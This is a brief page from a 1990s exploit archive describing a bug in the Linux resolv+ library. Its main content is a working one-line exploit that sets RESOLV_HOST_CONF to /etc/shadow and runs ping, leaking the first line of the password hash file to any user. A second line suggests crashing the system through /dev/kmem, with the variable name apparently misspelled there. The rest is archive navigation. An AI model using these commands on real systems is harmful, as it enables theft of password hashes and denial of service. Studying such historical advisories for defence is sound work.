Resolv+ Linux library bug

Summary
Description:The libresolv+ library can give out too much information and possibly to crash the system
Author:Possibly Jared Mauch (jared@puck.nether.net)
Compromise:users can read first line of any file (ie /etc/shadow) and they can possibly crash the system.
Vulnerable Systems:Many Linux distributions.
Date:1996
Details

Exploit: 
setenv RESOLV_HOST_CONF /etc/shadow; ping adfas

it might also be possibly to crash the system with things like:
'setenv RESOLV_HOST_CONV /dev/kmem;ping asdfas' or the like
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]